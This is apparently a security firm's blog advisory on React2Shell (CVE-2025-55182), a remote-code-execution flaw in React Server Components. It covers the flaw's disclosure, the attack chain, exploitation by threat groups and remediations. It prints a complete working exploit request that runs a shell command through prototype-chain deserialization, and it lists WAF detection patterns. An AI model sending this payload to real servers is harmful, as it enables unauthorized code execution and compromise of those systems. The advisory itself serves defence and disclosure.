Contact Us

Edit Template

React2Shell: How a Trusted Framework Became a Nation-State Attack Vector

React2Shell Vulnerability

Early December 2025 gave rise to a critical vulnerability where React Server Components (RSC) payloads were crafted and sent to server components endpoints to achieve the goal of arbitrary code execution. This vulnerability was thereby aptly titled “React2Shell” (React-to-Shell). After this exploit came to light, security teams within major firms observed rapid exploitations in the wild by malicious state-linked actors and other malicious third-parties. Within hours, these attacks allowed the existence of public Proof-of-Concepts and even toolkits to appear. The defense teams immediately published scanners, signatures for WAF to identify and patches to this exploit, each happening layer by layer.

The following packages were affected by the vulnerability:

  • react-server
  • react-server-dom-webpack
  • react-server-dom-parcel
  • react-server-dom-turbopack
  • react-server-dom-esm

The true nature of React2Shell is an insecure deserialization path that allows unauthenticated attackers to send RSC payloads to a server and gain shell access via Remote Code Execution (RCE) through a vulnerability residing within the React Flight Protocol which communicates between RSC and the client.

The root cause is the insufficient validation of these RSC payloads and their subsequent unsafe processing of the deserialized structure leading to the attacker crafting payloads to invoke server-side functionalities under web server privileges. This vulnerability was scored as Critical and affected many ‘next.js’ deployments that many websites used, causing an even greater magnification of the risk.

How React2Shell was discovered

React2Shell was discovered by Security Researcher Lachlan Davidson who then subsequently disclosed it to Meta’s React team on November 29, 2025.

The Meta and Vercel team released a public advisory on December 3, 2025, mentioning that the issue was responsibly reported in late November. This advisory was then referenced by various security vendors and cloud providers to perform root cause analysis which led to them creating various detection tools and signatures to combat the exploit. Hours after the advisory was published, heavy scanning and exploitation attempts were observed across the internet on websites which were using next.js and similar RSC packages and integrations.

The attack was then assigned it’s own official CVE identifier – CVE-2025-55182 and then added to the Known Exploited Vulnerabilities (KEV) Catalogue due to the active exploitation in the wild.

Technical overview of the attack

React2Shell, at its core, exploits the way React Flight handles “thenable” objects, the objects that behave like JavaScript Promises by exposing a ‘then’ method. The incoming chunks are processed by React’s deserializer and, when it encounters what appears to be a thenable, it resolves it as a Promise.

The following attack chain then unfolds:

  1. Prototype Chain Traversal: The attacker crafts a malicious multipart POST request containing a payload with the reference “$1:__proto__:then”. Because React’s chunk deserializer lacks proper ownership validation (specifically, a “hasOwnProperty” check), it traverses the JavaScript prototype chain up from a chunk object to “Chunk.prototype.then” – a function designed to process Promise-like objects.
  2. Forged Chunk Lifecycle: The attacker sets the chunk status to “resolved_model”, tricking React Flight into believing the data has already been fulfilled, further along in its lifecycle than it actually is. The chunk is now treated as “thenable”.
  3. Function Constructor Hijack: The malicious payload references “$1:constructor:constructor” to access the JavaScript “Function” constructor via the prototype chain. This is the equivalent of calling “new Function(attackerCode)” – a mechanism that evaluates arbitrary strings as executable JavaScript at runtime.
  4. Code Execution: The “_prefix” field within the crafted “_response” object contains the attacker’s JavaScript payload. When the deserializer resolves the fake thenable, it calls the resulting anonymous function, executing the attacker’s code with full server-side privileges.

Adding onto the criticality of this exploit, the chain triggers BEFORE any action ID validation occurs causing the “Next-Action”header value to be irrelevant. Meaning that any value present will trigger the vulnerable code path.

What is to be noted about this vulnerability is that it is NOT a client-side XSS issue. The attack specifically targets react components which processes RSC on the server-side which results in server code execution.

QuasarCyberTech React2Shell 2

Code-Based example

Based on publicly observed exploitation attempts and Proof-of-Concepts published by researchers and analysts, the following code is an example of the exploit payload and the breakdown of the same:

POST / HTTP/1.1

Host: target.example.com

Content-Type: multipart/form-data; boundary=----Boundary

Next-Action: x

------Boundary

Content-Disposition: form-data; name="0"

{

  "then": "$1:__proto__:then",

  "status": "resolved_model",

  "reason": -1,

  "value": "{\"then\": \"$B0\"}",

  "_response": {

    "_prefix": "process.mainModule.require('child_process').execSync('id');",

    "_formData": {

      "get": "$1:constructor:constructor"

    }

  }

}

------Boundary

Content-Disposition: form-data; name="1"

"$@0"

------Boundary--

Breakdown of key payload fields:

  • “then”: “$1:__proto__:then” – Traverses the prototype chain to reach “Chunk.prototype.then”, bypassing ownership validation.
  • “status”: “resolved_model” – Spoofs the chunk lifecycle state to trick the deserializer into treating the object as already resolved.
  • “_formData”: {“get”: “$1:constructor:constructor”} – Chains up through the constructor to access the “Function” constructor, enabling dynamic code evaluation.
  • “_prefix” – Contains the attacker’s arbitrary JavaScript payload, injected into a “Function()” call and executed on the server.

Note: The “_prefix” field, in a real-world campaign, would contain the payload to exfiltrate environment variables and execute the remote shell scripts alongside establishing persistent backdoors.

What was observed after the Vulnerability came to light

After the vulnerability was mentioned in the public advisory, threat actors began scanning and attempting the exploit almost immediately.

State-sponsored activities from China-nexus threat clusters were detected to be attempting the React2Shell exploit. AWS threat intelligence even disclosed two known groups, namely Earth Lamia and Jackpot Panda, to be actively exploiting React2Shell alongside the China-nexus clusters. Some which were successful were able to deploy a tunneler called “MINOCAT” allowing the actors to establish hidden directories, kill processes that would otherwise overwrite it and create persistent cron jobs and system services to maintain a persistent backdoor.

Popular malware campaigns were also observed such as XMRig – a Cryptomining malware campaign, PeerBlight Backdoor, CowTunnel and ZinFoq.

Wiz researches observed high volume of post-exploitation pivoting attempts aimed towards the goal of credential harvesting. This was done through dumping environment variables and querying cloud metadata endpoints specifically to capture IAM credentials and secrets.

The scale of the exploit also brough upon a rise to fake and non-functioning Proof-of-Concepts on GitHub which caused initial confusion towards determining the detection coverage and scope. It was necessary for vulnerable organizations to validate the exploit code against trusted sources before setting up the defensive posture to prevent false positives and letting legitimate threats through.

Remediations

Short Term

  1. Organizations are urged to swiftly update all vulnerable react packages to the latest version; For React – 19.0.1,19.1.2 or 19.2.1+ and for next.js – 15.3.2 or 16.0.6+.
  2. WAF rules are to be deployed to specifically block incoming requests containing pollution indicators such as the payloads containing “__proto__” or “constructor:constructor” in the POST bodies or an abnormal usage of Next-Action or rsc-action-id headers.
  3. Organizations which are not affected are to assume a breached posture and conduct forensic review of server logs for evidence of breach symptoms such as unexpected processes spawning, outbound connections to non-standard IP ports and addresses, file creations in temporary directories or unauthorized cron jobs or system services.
  4. Exposed secrets and credentials are to be rotated immediately along with IAM credentials, API keys, and database connection strings.
  5. Actively monitor for ongoing exploit activity for requests containing User-Agent associated with known React2Shell scanners or tagged with CVE-2025-55182.

Long Term

  1. RSC server processes must follow the principle of least privilege allowing minimum OS and cloud permissions. Non-root executions and restrictive security contexts should be enforced on Containerized workloads to limit post-exploitation impacts.
  2. Runtime security tools are to be deployed to assist with detection of anomalous processes such as shell spawning from web server processes, unexpected network connections or file system writes in sensitive or temporary paths.
  3. Organizations need to invest in a Software Bill of Materials (SBOM) tool to ensure efficient security communications between vendor and supplier / customer.
  4. Validation of Proof-of-Concepts against trusted sources to ensure that defense protocols, such as WAF rules, detection, and least-privilege architectures, can be setup accurately while eliminating as many false positives as possible.

QuasarCyberTech React2Shell 3

Conclusion

The sudden impact caused by the React2Shell exploit is a sobering reminder of the fact that, while deployed at a large scale and trusted implicitly, foundational frameworks can carry maximum-severity vulnerabilities. The speed at which threat actors, state-wide, groups, individuals all ran to exploit these highlights how tight the window between public disclosure and mass exploitation has become. For organizations who were both exploited and were at the risk of exploitation, this scenario has allowed them to investigate their security operations, mature them and train them around dependency management, test their rapid patching capability, and serve to act as a remediation exercise.

Connect with QuasarCyberTech Experts

Need strategic guidance on preparing your business for emerging cyber threats?
At QuasarCyberTech, our specialized cybersecurity solutions help organizations stay ahead of evolving risks. From Vulnerability Assessment and Penetration Testing (VAPT) to Security Operations Center (SOC) implementation, Red Team exercises, and Governance, Risk, and Compliance (GRC) frameworks, we provide the expertise and tools needed to secure your digital assets and infrastructure.

Contact us today to develop a customized security strategy for your organization.

References:
Github (assetnote/react2shell-scanner)
Google Cloud / GTIG
Amazon Web Services Security Blog
Sysdig
Microsoft Security Blog
Huntress
react2shell.com (Lachlan Davidson)

Previous Post

Leave a Reply

Your email address will not be published. Required fields are marked *


    Advisories & Blogs

    Discover the latest updates, insights, analyzed trends and strategies to make keep your business programs up-to-date with our research-driven advisories. Subscribe now for timely updates and expert guidance!

    Explore More

    Latest Posts

    • All Posts
    • Advisory
    • Blogs & Articles
    • Cyber Security
    • Staff Augmentation
    • Technology

    Categories

    Tags

    cropped cropped cropped quasar cybertech logo.png

    #1, State Bank Colony, Indira Nagar, Nashik, Maharashtra – 422009

    Linkedin X-twitter Facebook Instagram Whatsapp Youtube

    Privacy Policy | Terms of Use

    © 2024 Quasar CyberTech Pvt Ltd | All Rights Reserved